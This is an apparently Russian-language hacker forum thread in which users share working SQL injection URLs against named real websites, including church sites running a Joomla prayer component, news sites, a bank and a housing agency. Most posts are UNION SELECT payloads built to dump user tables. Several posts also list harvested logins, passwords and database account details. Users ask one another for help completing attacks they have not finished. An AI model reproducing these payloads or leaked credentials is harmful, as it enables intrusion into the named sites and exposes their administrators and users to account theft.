Хотел было заказать себе домик в Голландии через это агентство, ну да ладно. =) http://www.pandzoeker.nl/-housingonline/ Code: http://www.pandzoeker.nl/-housingonline/view.php?id=15050+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58),username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80+from+users/* Ник: otto Пароль: victor1
http://www.labtribo.ru/ Code: http://www.labtribo.ru/live/news.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2Bchar(58)%2Bcast(password+as+nvarchar)+FROM+users)-- admin:$lowh@nd$
sql-injection dozory.ru PHP: http://day-watch.dozory.ru/services/exp/top_actors/ настройки(вверху справа)- показывать в топах по 1' игроков сохраняем и видим ошибку. т.к. тему в разделе удалили, значит выкладываю здесь..Не пропадать же добру. Не зря ведь искал... осталось только раскрутить. У меня так и не получилось.. в union дошёл до 30 полей.... Отследил работу скрипта, можно ещё таким запросом PHP: http://day-watch.dozory.ru/services/exp/ajax_topactors.php?elem=alltop&date=?show_in_top=10%27%22
http://www.oke.ru/xo4u.php?id=-42708+UNION+select+1,2,passw,4,5,6,7,8,9,10+FROM+chausers+LIMIT+0,1/* Тока пароль пустой
через пост там не получится, надоть через куки... прогнал скриптом ради интереса до сотни... что-то там не так
vidsfree.net Porno admin:merlot5009 http://vidsfree.net/admin в админке ничего интересного adrianman:a103795:[email protected]
В погоне за читами! =) Я читер, епт. http://supercheats.com Code: http://teams.supercheats.com/category.php?cid=5'+union+select+1,2,concat_ws(char(58),screenname,*)+from+forum_users/* Не смог подобрать название колонки ПАРОЛЯ. Чудом подобрал screenname, пароль ни в какую...
Смог найти имена таблиц: Code: http://www.gym2.km.ua/?id=-14+union+select+TABLE_NAME+FROM%20INFORMATION_SCHEMA.TABLES+limit+0,200/* Нашел имена столбцов в jos_users Code: http://www.gym2.km.ua/?id=-14+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6A6F735F7573657273+limit+0,100/* Но вот FATALITY не получается сделать, вроде все правильно написано, но выводить инфу не хочет. Code: http://www.gym2.km.ua/?id=-14+union+select+concat(id,%20char(58),name,char(58),username,char(58),password,char(58),usertype,char(58),block,char(58),0x3C62723E)+FROM+jos_users+limit+0,10/*
2 Лайт Таблица в другой базе лови: _http://www.gym2.km.ua/?id=-14+union+select+concat(id,char(58),name,char(58),username,char(58),password,char(58),usertype,char(58),block,char(58),0x3C62723E)+FROM+test.jos_users+limit+0,10/*
.au PR - 2 PR - 4 agsafe@localhos:4.1.11-Debian_4sarge7:agsafe PR - 4 enviro@localhost:4.1.11-Debian_4sarge7:enviro 1:admin:m3mph15 PR - 4 agrione@localhost:4.0.20a-nt:agrirev PR - 4 PR - 5 winston@localhost:4.1.11-Debian_4sarge7:churchilltrust PR - 5 fred294@localhost:5.0.27-community-nt:isc PR - 6 Фильруется идентификатор страницы На сегодня все. Без дефейсов пожалуйста ) И еще - тем, кто считает, что постят в данной теме только тупые "разрушители": Вся информация о найденных уязвимостях сначала отправляется администратору сайта и только потом выкладывается в данный раздел для ознакомления.
Code: https://eed.llnl.gov/photos.php?id=7'+union+select+1,2,3,4,5,6,7,8,CONCAT(Version(),char(58),Database(),char(58),User()),10/*
Code: http://www.bahamasdevelopmentbank.com/feature.php?id=-1+union+select+all+1,concat(user,0x3a,password),3,null,5,6,7+from+mysql.user+limit+1,1--
вот сегодня насобирал.. 4.1.22-standard 4.1.22-standard 4.1.22-standard 5.0.45-community-log 4.1.22-standard-log 4.1.16 5.0.45 4.1.20-max-log::[email protected]::avanti_school 4.1.22-standard::wwwbuys_admin@localhost::wwwbuys_masterdb 5.0.45-log::[email protected]::bid4tackle 4.1.21-standard::webart_eexport@localhost::webart_export 5.0.45::market@localhost::market 5.0.51a-community::wwwbil_peter@localhost::wwwbil_AJauction 4.1.22-standard::zbidco_auction@localhost::zbidco_auctione 5.0.51-log::[email protected]::thamesn_nooglebid 4.1.22-standard-log::farmtofa_gerard@localhost::farmtofa_farmtofarm 5.0.45::repeat@localhost::repeat 5.0.22::auction_admin@localhost::auction 5.0.41-community-log::[email protected]::brownte_free-auction 4.1.20::bafgrosist@localhost:mgrosist
Немольшая потборка -- http://www.arcdi.com/trainers.php?id=-33+union+select+1,concat(username,0x3a,password),3 ,4,5+FROM+users%20--[/code]neeblee.com http://www.neeblee.com/plaincart/index.php?c=39&p=-33+union+select+1,concat_ws(0x3,user_name,user_pas sword),3,4,5+from+tbl_user/* -- PHP: /* <v5_01> (SQL INJ) http://www.prbc.org.au/churchsite/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.choosedestiny.com/index2.php?option=com_prayercenter&task=view_reque st&id=- 1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.prbc.org.au/churchsite/index.php?option=com_prayercenter&Itemid=51/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://connectinchrist.com/component/option,com_prayercenter/Itemid,74/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.worlddayofprayeraustralia.org/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://connectinchrist.com/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.ejesus.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.threecordstrand.net/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.threecordstrand.net/index.php?option=com_prayercenter&Itemid=30/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.icfaustralia.org.au/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.ejesus.com.br/index.php?option=com_prayercenter&Itemid=78/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.icfaustralia.org.au/index.php?option=com_prayercenter&Itemid=41/index2.php?option=com_prayercenter&task=view_reque st&id=1+UNION+SELECT+user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.promvr.com.br/principal/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.ibbt.org.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.ibbt.org.br/index.php?option=com_prayercenter&task=view/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.rccsaopaulo.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.rccgoias.org.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.rccsaopaulo.com.br/index.php?option=com_prayercenter&task=subscribe&I temid=/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.rccgoias.org.br/index.php?option=com_prayercenter&task=view/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.iem.org.br/site/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.iem.org.br/site/index.php?option=com_prayercenter&Itemid=69/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://igrejabatistaagape.org.br/joomla/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://gpom.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://gpom.com.br/index.php?option=com_prayercenter&task=new&Itemid=/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.canaljesus.com.br/media/option,com_prayercenter/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.canaljesus.com.br/media/option,com_prayercenter/Itemid,45.aspx/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- *\
.is Сегодня ужасный недохек Но зато отличные домены ) ir.is / fg.is / 69.is / numi.is / php.internet.is Code: [B][COLOR=YellowGreen]PR - 4[/COLOR][/B] http://[COLOR=Teal]www.acsr.be[/COLOR]/artic_gen.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* [B][COLOR=YellowGreen]PR - 5[/COLOR][/B] http://[COLOR=Teal]69.is[/COLOR]/openlink.php?id=52900+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* [B][COLOR=YellowGreen]PR - 5[/COLOR][/B] http://[COLOR=Teal]www.ornefni.is[/COLOR]/n-greinar2.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10/* http://[COLOR=Teal]php.internet.is[/COLOR]/kraftaheimar/lesa_frettina.php?id=-2187+union+select+1,2,3,4,5,6,7,8,9,10/* [email protected]:4.1.20-log:numi PR - 4 fguser@localhost:4.1.20-log:fg PR - 5 srr@localhost:5.0.32-Debian_7etch5-log:nam Кто докрутит - выкладывайте ) Там много где 4М, так что подбором токо Без дефейсов пожалуйсто )
еще одна ошибка в Limit Code: http://hq-films.ws/browse.php?page=0.01 кстати реально ченить с этой ошибкой сделать?
